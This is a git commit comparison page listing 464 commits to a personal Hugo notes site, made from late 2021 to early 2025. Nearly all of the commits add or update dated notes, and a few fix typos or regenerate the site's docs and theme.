Compare commits

...

464 Commits

Author SHA1 Message Date
63a2dcfdee Add notes for 2025-01-03 2025-01-03 12:37:39 +03:00
e7d7d4af89 Add notes 2024-12-04 16:27:49 +03:00
bd2d9779bb Add notes 2024-11-19 10:40:23 +03:00
47b96e8370 Add notes for 2024-10-08 2024-10-08 13:46:23 +03:00
512848fc73 Add notes for 2024-10-03 2024-10-03 11:51:44 +03:00
f8a1876ad2 Add notes for 2024-09-29 2024-09-30 07:56:53 +03:00
bb1367025a Add notes for 2024-09-23 2024-09-23 13:10:20 +03:00
dabbc20806 Update notes for 2024-09-16 2024-09-17 08:11:03 +04:00
edd2a8b306 Add docs again 2024-09-17 08:02:34 +04:00
842373d26f Update themes/hugo-theme-bootstrap4-blog 2024-09-17 08:01:55 +04:00
35342f95dc Add notes for 2024-09-16 2024-09-16 22:52:51 +04:00
79708bd30c Add notes for 2024-09-14 2024-09-14 23:02:16 +03:00
a5298945a3 Add notes for 2024-09 2024-09-09 10:20:09 +03:00
062019463c Add docs 2024-08-28 11:35:14 +03:00
f1c25111d0 Add notes 2024-08-28 11:35:05 +03:00
da6d73bc1f content/post/2024-07.md: fix spaces 2024-08-22 09:51:08 +03:00
7be53639dc Add content/posts/2024-08.md 2024-08-16 19:57:30 -07:00
64b8957945 Update notes 2024-08-07 08:54:13 -07:00
89d1b61442 Update notes for 2024-07-11 2024-07-11 13:08:22 +03:00
668947909a Add notes 2024-07-02 11:12:03 +03:00
7858008918 Add notes for 2024-06-21 2024-06-23 09:34:49 +03:00
c3436ea6c2 Add notes for 2024-06-18 2024-06-18 17:30:08 +03:00
bf4a6402d7 Add notes 2024-06-16 16:40:54 +03:00
8383cd466b Add notes for 2024-06-03 2024-06-03 17:31:03 +03:00
6d574d645d Add notes for 2024-05-28 2024-05-28 16:40:32 +03:00
befe3a3a58 Add notes for 2024-05-27 2024-05-27 21:40:09 +03:00
39d8d0876c Add notes for 2024-05-20 2024-05-20 17:34:14 +03:00
28a0c82e96 Minor syntax fix in example 2024-05-16 08:27:56 +03:00
7fc97884df Add notes for 2024-05-13 2024-05-13 16:24:11 +03:00
223453adbb Add notes for 2023-05-13 2024-05-13 08:21:17 +03:00
1b523bf055 Add notes for 2024-05-05 2024-05-05 21:43:52 +03:00
908a75a5c7 Add notes for 2024-05-01 2024-05-01 17:10:05 +03:00
e323c15e8b Add notes for 2024-04-29 2024-04-29 17:21:28 +03:00
8f156a0365 Add notes 2024-04-27 11:22:58 +03:00
515cc0650f Add notes 2024-04-25 15:28:35 +03:00
6db3da2739 Add notes 2024-04-18 17:00:25 +03:00
60b244486f Add notes 2024-04-18 09:38:02 +03:00
efd8eb7f79 Add notes 2024-04-16 09:35:30 +03:00
281827944a Add notes for 2024-04-12 2024-04-12 20:40:52 +03:00
864b3b136e Add notes 2024-04-09 16:50:56 +03:00
01a2ff5bfd Add notes 2024-04-04 10:23:49 +03:00
d71c430a7d Add notes 2024-03-25 18:53:18 +03:00
0e43fc97d7 Add notes for 2024-03-19 2024-03-19 16:24:20 +03:00
90c4d46607 Add notes 2024-03-19 09:01:13 +03:00
83c053f7ee Add notes for 2024-03-13 2024-03-14 09:29:05 +03:00
ba68787282 Update notes for 2024-03-11 2024-03-11 21:58:15 +03:00
1fc45e8f1b Add notes for 2024-03-11 2024-03-11 18:04:40 +03:00
11f1935f85 Add notes for 2024-03-08 2024-03-08 17:31:19 +03:00
5ff70af33b Add notes for 2024-03 2024-03-04 10:02:14 +03:00
b60a58f56a Fix date for 2024-02 frontmatter 2024-03-01 09:55:02 +03:00
cc28c0ccdc Add notes for 2024-02-29 2024-02-29 16:38:38 +03:00
1e87242956 Add notes for 2024-02-29 2024-02-29 09:41:44 +03:00
483a170f06 Add notes 2024-02-27 17:18:35 +03:00
0692b8666c Add notes for 2024-02-23 2024-02-24 20:44:15 +03:00
b2eaff29b1 Add notes for 2024-02-20 2024-02-20 22:55:09 +03:00
da0fd61b7e Add notes for 2024-02-19 2024-02-19 16:48:20 +03:00
3f4b66bd08 Add notes for 2024-02 2024-02-06 11:45:02 +03:00
ed290fb6f8 Add notes for 2024-01-29 2024-02-05 11:09:40 +03:00
63c20dbef9 Add notes for 2024-01-27 2024-01-28 09:23:40 +03:00
300b2e4271 Notes for 2024-01-23 2024-01-24 08:24:50 +03:00
57fe0587a4 Add notes 2024-01-18 15:59:49 +03:00
20ace46614 Add notes 2024-01-10 17:21:12 +03:00
3475d4fd5d Add notes for 2024-01-10 2024-01-10 08:34:16 +03:00
1dfb54ef6b Update notes for 2024-01-07 2024-01-07 22:18:43 +03:00
82c79fc257 Add notes for 2024-01-07 2024-01-07 20:43:02 +03:00
cf5c1e2155 Add notes for 2024-01-06 2024-01-06 17:46:07 +03:00
7418dae4b9 Add notes 2024-01-05 15:45:46 +03:00
264cdcf1db Add notes 2023-12-29 12:08:57 +03:00
293b500b26 content/posts/2023-07.md: minor grammar fix 2023-12-27 10:48:32 +03:00
17a241de5b Add notes for 2023-12-20 2023-12-21 10:09:15 +03:00
7695eacf7a Add notes 2023-12-18 23:15:27 +03:00
f4c985c16b Add notes for 2023-12-12 2023-12-12 14:57:07 +03:00
bc6412de09 Add notes for 2023-12-08 2023-12-09 09:55:16 +03:00
2ecafafc17 Notes for 2023-12-08 2023-12-08 16:32:48 +03:00
804a505ae2 docs: regenerate 2023-12-06 20:57:19 +03:00
6c5fa7375f Fix notes for 2023-11 2023-12-06 20:57:07 +03:00
f2bee38014 Add notes for 2023-12-05 2023-12-06 09:55:57 +03:00
a50fe66c78 Add notes 2023-12-02 10:38:09 +03:00
177c3b796d Add notes for 2023-11-23 2023-11-23 16:15:13 +03:00
eb218389a0 Add notes for 2023-11-18 2023-11-19 14:29:52 +03:00
1dd5900fbf Add notes for 2023-11-16 2023-11-16 17:25:15 +03:00
d14dd7114a Add notes for 2023-11-11 2023-11-13 16:54:36 +03:00
01fb17950b Add notes 2023-11-08 08:20:31 +03:00
c6d514bef9 Add notes for 2023-11-02 2023-11-02 20:58:43 +03:00
34523acc47 Add notes for 2023-10-27 2023-10-27 17:09:30 +03:00
3a4ecbd82d Add notes 2023-10-24 23:26:01 +03:00
c9bcfca903 Add notes for 2023-10-16 2023-10-16 17:03:59 +03:00
7e3a7951d6 Add notes for 2023-10-13 2023-10-13 17:17:41 +03:00
8d39fc7d71 Fix typo 2023-10-08 22:04:41 +03:00
22dd379e9a Add notes for 2023-10-07 2023-10-08 10:57:53 +03:00
98cdd21cb5 Add notes for 2023-10-06 2023-10-06 15:19:34 +03:00
62838a091c Add notes for 2023-10-05 2023-10-05 17:58:03 +03:00
cb40610726 Update notes 2023-10-04 09:24:33 +03:00
249d9be387 Update notes 2023-09-30 13:07:23 +03:00
4a02a78186 Add notes for 2023-09-25 2023-09-25 17:38:05 +03:00
aa6cbb488d Add notes for 2023-09-22 2023-09-23 10:15:01 +03:00
aeaa397612 Add notes for 2023-09-19 2023-09-19 21:13:52 +03:00
d60b85433d Update notes for 2023-09-16 2023-09-16 23:38:04 +03:00
202d3fb88f Add notes for 2023-09-16 2023-09-16 20:24:24 +03:00
afcbc67874 Add notes for 2023-09-13 2023-09-14 20:57:25 +03:00
22e47beeb6 Add notes for 2023-09-10 2023-09-11 09:18:52 +03:00
223979f267 Add notes for 2023-09-09 2023-09-10 09:58:29 +03:00
28d62f1c0c Update notes for 2023-09-08 2023-09-09 00:25:48 +03:00
34bf124d5d Add notes for 2023-09-08 2023-09-09 00:25:12 +03:00
011a1ec9db Add notes for 2023-09-03 2023-09-04 09:16:51 +03:00
45781d590d Add notes for 2023-09-02 2023-09-02 17:37:15 +03:00
d8e0004240 Add notes 2023-09-01 08:10:02 +03:00
bfb7da50af Add notes for 2023-08-31 2023-08-31 17:36:25 +03:00
6ec5e4b006 Add notes 2023-08-30 19:16:01 +03:00
1529cfd80b Add notes 2023-08-29 21:38:23 +03:00
6737febf95 Add notes for 2023-08-26 2023-08-26 19:27:57 +03:00
6fbcc342d2 Add notes for 2023-08-25 2023-08-25 17:06:19 +03:00
e83e681706 Add notes for 2023-08-24 2023-08-24 21:58:03 +03:00
33061dbe3a Add notes for 2023-08-23 2023-08-24 09:03:46 +03:00
d2ad21bde1 Add notes for 2023-08-22 2023-08-22 17:28:49 +03:00
f38ecfb75e Add notes for 2023-08-18 2023-08-18 23:54:07 +03:00
24dd6fefb5 Add notes for 2023-08-14 2023-08-14 18:38:03 +02:00
a659eef05f Fix name 2023-08-14 10:39:08 +02:00
9944f61ed5 Add notes for 2023-08-12 2023-08-13 05:54:16 +02:00
87ccbfc0f0 Add notes for 2023-08-11 2023-08-11 12:25:50 +02:00
929ce9685a Add notes for 2023-08-08 2023-08-08 12:54:39 +02:00
e0f9e484ee Add notes for 2023-08-07 2023-08-07 10:48:56 +02:00
021a92c0d9 Add notes for 2023-08-05 2023-08-05 17:27:43 +03:00
c97d005aa4 Add notes for 2023-08-04 2023-08-04 18:05:44 +03:00
190a1ee4a3 Add notes for 2023-07-31 2023-08-02 23:04:11 +03:00
9a2de13f21 Add notes for 2023-07-28 2023-07-28 12:18:39 +03:00
c644f40491 Add notes 2023-07-28 11:59:59 +03:00
6e701ee9c2 Add notes for 2023-07-25 2023-07-25 23:54:53 +03:00
e4dc8a3ed0 Add notes for 2023-07-22 2023-07-22 09:19:48 +03:00
74f4afe72a Add notes for 2023-07-20 2023-07-20 16:02:38 +03:00
8bebf47078 Add some days of notes 2023-07-19 12:27:43 +03:00
8c1e898683 Add notes for 2023-07-08 2023-07-08 23:20:53 +03:00
89d3fb717c Add notes for 2023-07-05 2023-07-05 16:36:30 +03:00
309ffad285 Add notes for 2023-07-03 2023-07-04 08:03:36 +03:00
0fab2a0f28 Add notes 2023-07-01 17:17:31 +03:00
ae41ef3682 Add notes for 2023-06-28 2023-06-28 20:11:34 +03:00
4415eec1a0 Add notes for 2023-06-19 2023-06-19 16:26:41 +03:00
6985b53a7b Add notes for 2023-06-17 2023-06-17 23:14:32 +03:00
df88592009 Add notes for 2023-06-14 2023-06-14 20:29:35 +03:00
3a68bc3cc7 Add notes for 2023-06-13 2023-06-13 20:58:57 +03:00
943fa8f1a2 Add notes for 2023-06-09 2023-06-10 09:17:08 +03:00
363dbb4505 Add notes for 2023-06-08 2023-06-08 17:04:20 +03:00
bda3cb4cd1 Add notes for 2023-06-06 2023-06-06 16:54:25 +03:00
33c42ecd49 Add notes for 2023-06-04 2023-06-04 11:00:30 +03:00
a9dc98b2dd Add notes for 2023-06-02 2023-06-02 16:33:48 +03:00
0b0d2ea87d Add notes 2023-06-02 08:53:06 +03:00
825385562d Add notes for 2023-05-30 2023-05-30 20:19:17 +03:00
416d2bc7a7 Add notes for 2023-05-26 2023-05-26 17:04:18 +03:00
7cde2ad26b Add notes for 2023-05-22 2023-05-23 08:49:01 +03:00
5fbc484c80 Add notes 2023-05-20 11:10:05 +03:00
aa5fab70b7 Add notes for 2023-05-18 2023-05-18 16:47:51 +03:00
d8be9c001c Add notes for 2023-05-12 2023-05-12 14:02:55 +03:00
a4a725f22e Add notes for 2023-05-11 2023-05-12 08:33:20 +03:00
572f4639ac Add notes for 2023-05-04 2023-05-04 17:27:29 +03:00
b4a5ec05e7 content/posts/2023-04.md: update image format scores
After re-calculation with ssimulacra2 v2.1.
2023-05-04 14:44:51 +03:00
e1aa40cf0e Add notes 2023-05-04 08:38:27 +03:00
bd36e93cd9 Update notes 2023-05-03 17:10:37 +03:00
820114f464 Add notes 2023-05-02 10:39:34 +03:00
ad8516bbb3 Add notes for 2023-04-27 2023-04-27 13:10:13 -07:00
0ca3cadbef Add notes for 2023-04-22 2023-04-22 16:37:19 -07:00
c20f1e1f89 Add notes for 2023-04-20 2023-04-20 22:44:18 -07:00
b024eb1f94 Add notes for 2023-04-18 2023-04-18 11:08:15 -07:00
85438953ce Add notes for 2023-04-06 2023-04-06 16:13:30 +03:00
5a0b3aaec1 Add notes for 2023-04-02 2023-04-02 09:16:25 +03:00
a2875a3811 Add notes for 2023-03-30 2023-03-30 16:59:20 +03:00
479bb9684a Update notes for 2023-03-28 2023-03-28 23:38:38 +03:00
5cd298a37a Add notes for 2023-03-28 2023-03-28 17:04:54 +03:00
37bdf2645f Add notes for 2023-03-27 2023-03-27 10:03:45 +03:00
11646971a9 Add notes for 2023-03-24 2023-03-24 13:19:13 +03:00
534f0d9cf8 Add notes for 2023-03-21 2023-03-22 08:28:33 +03:00
66a1f54e3a Add notes for 2023-03-21 2023-03-21 16:35:41 +03:00
cfdd1cb7fa Add notes for 2023-03-19 2023-03-19 19:48:06 +03:00
e926834065 Add notes for 2023-03-18 2023-03-18 17:42:40 +03:00
68b378845a Add notes for 2023-03-15 2023-03-15 08:03:48 +03:00
e9dd768d66 content/posts/2023-01.md: fix typos 2023-03-14 14:30:17 +03:00
40fe625083 Add notes 2023-03-13 21:22:25 +03:00
345cd4365b Add notes for 2023-03-10 2023-03-10 17:34:05 +03:00
bee6532af2 Add notes for 2023-03-09 2023-03-09 17:01:50 +03:00
5787bc326c Add notes for 2023-03-08 2023-03-08 18:53:32 +03:00
f5d24aa841 Add notes for 2023-03-07 2023-03-07 17:15:26 +03:00
2b98b5cda7 Add notes for 2023-03-07 2023-03-07 10:05:12 +03:00
19f8de4481 Update notes 2023-03-07 09:53:31 +03:00
7a48286d6b Add notes 2023-03-01 08:30:25 +03:00
e06160976c Add notes 2023-02-26 19:59:12 +03:00
2e80702de4 Add notes for 2023-02-22 2023-02-22 21:37:12 +03:00
ba6f826201 content/posts/2022-08.md: syntax fix 2023-02-22 11:59:48 +03:00
47f2c6c17f Add notes for 2023-02-21 2023-02-21 20:46:53 +03:00
a667e6986e Add notes for 2023-02-15 2023-02-15 19:47:13 +03:00
617c0eec3c Add notes for 2023-02-14 2023-02-14 23:13:35 +03:00
0b64999280 Add notes for 2023-02-12 2023-02-13 10:33:39 +03:00
d5214f02e1 Add notes for 2023-02-08 2023-02-09 08:50:54 +03:00
16ba5723eb Add notes for 2023-01-31 2023-01-31 22:20:38 +03:00
81f04f48ad Add notes for 2023-01-29 2023-01-29 18:19:31 +03:00
2c7f6b3e39 Add notes 2023-01-22 21:53:45 +03:00
ddb1ce8f4e Add notes for 2023-01-17 2023-01-17 22:38:55 +03:00
3f4e42fe37 Add notes for 2023-01-15 2023-01-15 08:10:16 +03:00
db4b0a6fd6 Add notes for 2023-01-12 2023-01-12 23:11:42 +03:00
967b16a966 Add notes for 2023-01-10 2023-01-10 22:22:03 +03:00
d1278a67d8 Add notes for 2023-01-04 2023-01-04 17:08:14 +03:00
676eefafbb content/posts/2022-11.md: Fix syntax for image 2023-01-04 10:53:02 +03:00
b781203a58 Add notes for 2023-01-01 2023-01-01 10:12:13 +02:00
9768a0fe57 Add notes for 2022-12-29 2022-12-29 08:32:08 +02:00
2e6c267397 Add notes for 2022-12-28 2022-12-28 22:55:34 +02:00
bf122d4ac3 Add notes for 2022-12-25 2022-12-25 16:48:19 +02:00
249a63404b Add notes for 2022-12-23 2022-12-23 10:04:37 +02:00
3be39e67fa Add notes for 2022-12-21 2022-12-21 20:39:09 +02:00
8354acdbdd Add notes for 2022-12-18 2022-12-19 07:03:13 +02:00
54769fcb04 Add notes for 2022-12-15 2022-12-15 16:41:04 +03:00
aaec17b94d Add notes for 2022-12-14 2022-12-14 22:14:03 +03:00
9c1e60426a Add notes for 2022-12-12 2022-12-12 18:17:33 +03:00
1bafe6ce71 Add notes for 2022-12-08 2022-12-08 18:59:57 +02:00
4200ae4189 Add notes for 2022-12-07 2022-12-07 22:59:37 +01:00
12b4f1660d Add notes for 2022-12-03 2022-12-04 03:19:49 +03:00
1dd80f769a Add notes for 2022-12-02 2022-12-03 10:46:29 +03:00
651148cf0a Add notes for 2022-11-30 2022-11-30 18:21:20 +03:00
0599df9bed Add notes for 2022-11-30 2022-11-30 12:35:31 +03:00
4f254af2f3 Update notes for 2022-11-28 2022-11-28 23:19:19 +03:00
8199de67ad Add notes for 2022-11-28 2022-11-28 17:42:46 +03:00
f5750dab39 Add notes for 2022-11-27 2022-11-27 13:52:43 +03:00
6240bdf5ad content/posts/2022-11.md: fix typo 2022-11-27 12:38:48 +03:00
59cd155eb3 Add notes for 2022-11-26 2022-11-26 17:38:27 +03:00
b5b28f2d78 Add notes for 2022-11-24 2022-11-24 17:41:34 +03:00
b9d764d026 Add notes for 2022-11-23 2022-11-23 17:10:47 +03:00
de6172b45a Add notes for 2022-11-21 2022-11-21 10:31:02 +03:00
4e6a8ec51b Add notes for 2022-11-09 2022-11-10 15:45:04 +03:00
c63abf656d Add notes for 2022-11-07 2022-11-07 17:18:14 +03:00
7544ee54ea Add notes for 2022-11-01 2022-11-01 22:12:24 +03:00
d48d74c981 Add notes for 2022-10-31 2022-10-31 16:59:47 +03:00
5ae92a2334 Add notes for 2022-10-30 2022-10-31 07:48:00 +03:00
3633377854 Add notes for 2022-10-28 2022-10-28 13:17:35 +03:00
189f33e1ce Add notes for 2022-10-26 2022-10-26 17:50:40 +03:00
5da2c1eff7 Add notes for 2022-10-25 2022-10-26 09:15:29 +03:00
3e8da69de7 Add notes for 2022-10-25 2022-10-25 16:38:17 +03:00
3f0d06239b Add notes for 2022-10-22 2022-10-23 12:33:23 +03:00
46a9178bdb Add notes for 2022-10-19 2022-10-19 21:32:01 +03:00
7713ecefa8 Add notes for 2022-10-18 2022-10-18 22:12:42 +03:00
a1ddc29951 Add notes for 2022-10-17 2022-10-17 15:58:02 +03:00
96cdb781fb Add notes 2022-10-15 17:38:47 +03:00
55a231611f Add notes for 2022-10-12 2022-10-13 07:10:59 +03:00
57288fad56 Add notes for 2022-10-09 2022-10-09 21:19:38 +03:00
510dd965ea Add notes 2022-10-07 21:29:35 +03:00
42f0fc6147 Add notes for 2022-10-05 2022-10-05 17:22:42 +03:00
9a88b6c1b5 Add notes for 2022-10-03 2022-10-03 16:26:30 +03:00
652f181273 Add notes for 2022-10-01 2022-10-01 19:47:37 +03:00
c7aec5606c Add notes for 2022-09-30 2022-09-30 17:29:50 +03:00
96f47ec7b5 Update notes for 2022-09-28 2022-09-28 21:23:10 +03:00
f1bb112554 Add notes for 2022-09-29 2022-09-28 17:10:23 +03:00
a2ca9483c4 content/posts/2022-08.md: add update to issue 2022-09-27 14:35:26 +03:00
98a3695d0d Add notes for 2022-09-26 2022-09-26 17:17:19 +03:00
a156315103 Update notes for 2022-09-25 2022-09-25 21:02:46 +03:00
ecb09f0a54 Add notes for 2022-09-25 2022-09-25 14:32:38 +03:00
062450e84f Add notes for 2022-09-24 2022-09-24 09:26:29 +03:00
c9e2325f34 Add notes for 2022-09-23 2022-09-23 16:49:58 +03:00
ae01de27c5 Add notes for 2022-09-22 2022-09-22 21:59:15 +03:00
fbf08b7003 Add notes for 2022-09-19 2022-09-19 15:58:41 +03:00
3b78d2f7e4 Add notes for 2022-09-18 2022-09-18 21:04:01 +03:00
1b15837e4e Add notes for 2022-09-16 2022-09-16 17:09:32 +03:00
e0d4d1ff7f Add notes for 2022-09-14 2022-09-15 08:37:57 +03:00
954f3598bd content/posts/2022-09.md: fix date 2022-09-15 08:37:36 +03:00
547a92723d Add notes for 2022-09-12 2022-09-12 17:07:29 +03:00
147ad86375 Add notes for 2022-09-12 2022-09-12 11:35:57 +03:00
69392070de Add notes for 2022-09-09 2022-09-09 17:29:51 +03:00
aa77e80c44 Add notes for 2022-09-08 2022-09-08 17:47:25 +03:00
ef3b4f1176 Add notes for 2022-09-07 2022-09-07 18:00:26 +03:00
5972b89839 Add notes for 2022-09-06 2022-09-06 17:48:46 +03:00
ac66d6c1a9 Add notes for 2022-09-05 2022-09-05 16:59:11 +03:00
6ce43e6a95 Add notes for 2022-09-01 and 2022-09-02 2022-09-02 16:41:19 +03:00
baf1cea539 Add notes 2022-08-31 17:37:28 +03:00
d9e2669a3d Add notes for 2022-08-30 2022-08-30 17:45:35 +03:00
49af872267 Add notes for 2022-08-29 2022-08-29 04:54:12 +03:00
5084b5ca5e Add notes for 2022-08-24 2022-08-24 21:24:07 -07:00
64d5b998f9 Add notes for 2022-08-23 2022-08-23 12:14:14 -07:00
8e6c83a5e1 Add notes for 2022-08-20 2022-08-20 22:37:35 -07:00
daf4a646ed Add notes for 2022-08-19 2022-08-19 21:55:36 -07:00
fc0a9ad944 Update notes for 2022-08-18 2022-08-18 22:43:37 -07:00
e203ee6dcc Add notes for 2022-08-18 2022-08-18 13:45:48 -07:00
6c61d1c102 Add notes for 2022-08-15 2022-08-15 18:46:57 -07:00
498690ac42 Update notes for 2022-08-13 2022-08-13 21:51:49 -07:00
ad4f3486fd Add notes for 2022-08-13 2022-08-13 21:37:48 -07:00
0207664d3a Update notes for 2022-08-05 2022-08-05 21:09:24 +03:00
073e814b1d Update notes for 2022-08-05 2022-08-05 21:05:13 +03:00
5060774b90 Add notes for 2022-08-05 2022-08-05 19:10:21 +03:00
2d8532e10e Add notes for 2022-08-03 2022-08-03 21:01:39 +03:00
ad8e345f72 Regenerate docs 2022-08-01 16:36:13 +03:00
8a10872f53 themes: update theme submodule 2022-08-01 16:35:32 +03:00
a7b90e58ab Update notes for 2022-07-30 2022-07-31 15:49:35 +03:00
d9bfdbef2b Add notes for 2022-07-28 2022-07-28 16:55:36 +03:00
109c63e10d Add notes for 2022-07-27 2022-07-27 23:02:19 +03:00
41476b9c63 Add notes for 2022-07-25 2022-07-25 22:33:25 +03:00
8ead752ee8 Update notes for 2022-07-22 2022-07-22 22:28:51 +03:00
b98d07bc1f Add notes for 2022-07-22 2022-07-22 16:42:06 +03:00
a0456cd0f7 Update notes 2022-07-21 10:03:16 +03:00
daf209efb9 Update notes for 2022-07-18 2022-07-18 16:45:55 +03:00
92b115ef62 Add notes for 2022-07-18 2022-07-18 12:32:23 +03:00
6fb5aa2be0 Add notes for 2022-07-17 2022-07-17 22:45:16 +03:00
05bf1fa02d Add notes for 2022-07-14 2022-07-14 16:46:24 +03:00
3c61d0a06b Update notes 2022-07-12 12:15:17 +03:00
11ce30438c Add notes for 2022-07-08 2022-07-08 15:49:45 +03:00
19715c3295 Add notes for 2022-07-06 2022-07-07 10:02:04 +03:00
fc1e83e76d Add notes for 2022-07-04 2022-07-04 22:10:02 +03:00
9a5acf2e32 Add notes for 2022-07-04 2022-07-04 17:20:01 +03:00
4d4bde3474 Add notes for 2022-07-03 2022-07-04 09:25:14 +03:00
05cf7a26ec Add notes for 2022-06-30 2022-06-30 16:48:03 +03:00
53f60284e2 Add notes for 2022-06-29 2022-06-30 09:41:54 +03:00
368d60df56 Add notes for 2022-06-26 2022-06-26 18:11:33 +03:00
b913ff5353 Add notes for 2022-06-24 2022-06-24 14:49:37 +03:00
8db6f5489a Add notes for 2022-06-22 2022-06-23 08:40:53 +03:00
fb24585ec8 Add notes 2022-06-21 16:59:04 +03:00
71d92e0a5e Add notes for 2022-06-18 2022-06-18 20:39:37 +03:00
388b19b513 Add notes for 2022-06-17 2022-06-17 16:46:56 +03:00
7e9f2f8226 Update notes for 2022-06-16 2022-06-16 19:51:59 +03:00
ec0b3c243f Add notes for 2022-06-16 2022-06-16 16:25:51 +03:00
4e58a25e25 Add notes for 2022-06-13 2022-06-14 08:45:07 +03:00
8a06bab2c6 Regenerate docs 2022-06-13 15:53:16 +03:00
6debe66cfc content/posts/2022-03.md: syntax 2022-06-09 09:41:49 +03:00
1a90a46f05 Add notes for 2022-06-08 2022-06-08 15:36:09 +03:00
3761d1a56f Update notes for 2022-06-06 2022-06-06 16:54:08 +03:00
31b329595f Add notes for 2022-06-06 2022-06-06 09:45:43 +03:00
e478850def Add notes for 2022-05-30 2022-05-30 16:00:02 +03:00
b5642c03f2 Add notes for 2022-05-28 2022-05-28 18:25:00 +03:00
ad9f569b0d Update notes for 2022-05-27 2022-05-27 16:46:18 +03:00
3e8dc96a81 Add notes for 2022-05-27 2022-05-27 12:47:33 +03:00
ce7c03cbfd Add notes for 2022-05-26 2022-05-26 15:01:15 +03:00
cc24e999df Add notes for 2022-05-25 2022-05-25 17:05:40 +03:00
f783b75f4e Add notes for 2022-05-24 2022-05-24 22:10:47 +03:00
6cdc293aa1 Add notes for 2022-05-23 2022-05-24 09:42:54 +03:00
9e0a16160e Add notes for 2022-05-14 2022-05-15 15:31:43 +03:00
6ebb69e95d Add notes for 2022-05-13 2022-05-13 16:56:22 +03:00
7916af5417 Add notes for 2022-05-13 2022-05-13 10:28:23 +03:00
f07c04bd7e Add notes for 2022-05-12 2022-05-13 08:39:15 +03:00
efcc5b5ede Update notes for 2022-01 2022-05-12 12:51:45 +03:00
2f09551962 Add notes for 2022-05-10 2022-05-10 16:35:50 +03:00
a29f0f9c1c Add notes for 2022-05-07 2022-05-08 21:23:36 +03:00
3105a92d7f Regenerate docs 2022-05-05 16:58:42 +03:00
da7b6e2f20 Update notes for 2020-02 2022-05-05 16:50:10 +03:00
f8d002dbd1 Update notes for 2022-05-05 2022-05-05 12:47:48 +03:00
3890c1fd7d Add notes for 2022-05-05 2022-05-05 12:46:13 +03:00
ca294919f2 Update notes for 2022-05-04 2022-05-04 16:48:24 +03:00
b0ba32c97c Add notes for 2022-05-04 2022-05-04 11:09:45 +03:00
cf8f13d09c Add notes for 2022-04-27 2022-04-28 08:49:31 +03:00
5cfe954a53 Add notes for 2022-04-27 2022-04-27 09:58:45 +03:00
4ddc675e55 Update date on 2022-04 content 2022-04-27 08:44:10 +03:00
18978ad1ed Add notes for 2022-04-25 2022-04-26 09:47:01 +03:00
4d5c669d89 Add notes for 2022-04-24 2022-04-24 21:06:28 +03:00
278770414a Add notes for 2022-04-23 2022-04-23 13:05:02 +03:00
4f023e2bcc Update notes for 2022-04-18 2022-04-18 21:43:48 +03:00
9d880998ad Add notes for 2022-04-18 2022-04-18 10:45:12 +03:00
9b88b678c1 Add notes for 2022-04-16 2022-04-16 22:41:45 +03:00
138713baad Add notes for 2022-04-13 2022-04-13 16:52:34 +03:00
bad7d9bb7f Add notes for 2022-04-10 2022-04-10 23:38:31 +03:00
d7abff0a5b Update notes for 2022-04-04 2022-04-04 21:34:14 +03:00
549f6cab80 Add notes for 2022-04-04 2022-04-04 19:15:58 +03:00
054d666fe0 Add notes for 2022-03-31 2022-03-31 16:09:14 +03:00
79b5f023e1 Update notes for 2022-03-29 2022-03-29 21:26:07 +03:00
123d90165f Add notes for 2022-03-29 2022-03-29 16:01:48 +03:00
7b99451f26 Add notes for 2022-03-28 2022-03-28 16:09:34 +03:00
f385e2738b Update note for 2022-03-26 2022-03-26 19:13:21 +03:00
debc252d0e Add notes for 2022-03-26 2022-03-26 10:33:53 +03:00
311a7a4b47 Add notes for 2022-03-25 2022-03-25 12:19:45 +03:00
c2e1140591 Add notes for 2022-03-25 2022-03-25 12:17:36 +03:00
31690d514c Update notes for 2022-03-24 2022-03-24 22:54:47 +03:00
93e828a901 Add notes for 2022-03-24 2022-03-24 22:14:56 +03:00
017a1f5502 Regenerate public 2022-03-22 22:04:11 +03:00
8f7c87002b Fix tweet shortcode 2022-03-22 22:03:59 +03:00
9fc0935448 Add notes for 2022-03-22 2022-03-22 22:03:45 +03:00
dcd2a9b7e5 Add notes for 2022-03-22 2022-03-22 16:02:11 +03:00
c4c651385a Add notes for 2022-03-16 2022-03-16 18:32:01 +03:00
5a6fcdd20e Add notes for 2022-03-13 2022-03-13 22:08:57 +03:00
dd179fada7 Add notes for 2022-03-10 2022-03-10 14:35:14 +03:00
2569fa215b Add notes for 2022-03-05 2022-03-05 23:14:13 +03:00
27acbac859 Add notes for 2022-03-04 2022-03-04 15:30:06 +03:00
7453499827 Add notes for 2022-03-01 2022-03-01 17:48:40 +03:00
7a0cfadc3d Update notes 2022-03-01 17:17:27 +03:00
d6c9b70e3a Add notes for 2022-02-26 2022-02-26 12:49:19 +03:00
edacbe8b63 Add notes for 2022-02-24 2022-02-24 19:15:45 +03:00
3baa93a1f2 Add notes 2022-02-23 14:46:23 +03:00
9b4498de04 Add notes for 2022-02-14 2022-02-14 16:43:12 +03:00
e3109b7483 Update notes 2022-02-14 09:40:59 +03:00
67a05b80ea Update notes for 2022-02-10 2022-02-11 09:41:05 +03:00
564bb11984 Add notes for 2022-02-10 2022-02-10 20:35:40 +03:00
9a1280a7ed Add notes for 2022-02-08 2022-02-08 19:07:20 +03:00
2903ae05a0 Add notes for 2022-02-07 2022-02-07 11:39:54 +03:00
69c7f3b684 Fix notes for 2022-01 2022-02-07 09:49:34 +03:00
e4536c5d60 Add content for 2022-02-03 2022-02-04 08:15:52 +03:00
df9927603f Add notes for 2022-02-02 2022-02-02 23:51:22 +03:00
b6951579f6 Update notes for 2022-02-01 2022-02-02 09:11:43 +03:00
b3177cd44e Add notes for 2022-02-01 2022-02-01 17:54:45 +03:00
ed9fb3fe99 Add notes for 2022-01-30 2022-01-31 09:00:59 +03:00
673f718ef3 Add notes for 2022-01-28 2022-01-28 16:59:40 +03:00
9efd56b405 Add notes 2022-01-27 16:58:05 +03:00
6884711948 Add notes for 2022-01-19 2022-01-19 18:14:26 +03:00
69f733f2be Add notes for 2022-01-09 2022-01-12 19:55:47 +02:00
0ed959e085 Update syntax in notes for 2021-12 2022-01-09 10:39:51 +02:00
6770385f36 Add notes for 2022-01-06 2022-01-06 15:48:37 +02:00
2c3ab62925 Regenerate docs 2022-01-01 15:21:47 +02:00
49148c043c Add notes for 2022-01-01 2022-01-01 15:21:32 +02:00
4d35572e92 Add notes for 2021-12-29 2021-12-29 16:29:37 +02:00
6ff55cc003 Add notes for 2021-12-28 2021-12-28 13:24:23 +02:00
590558d0bf Add notes for 2021-12-19 2021-12-19 22:03:42 +02:00
f5a0ea201e Add notes for 2021-12-08 2021-12-08 19:34:39 +02:00
6b9ff040ed Add notes for 2021-12-08 2021-12-08 08:47:33 +02:00
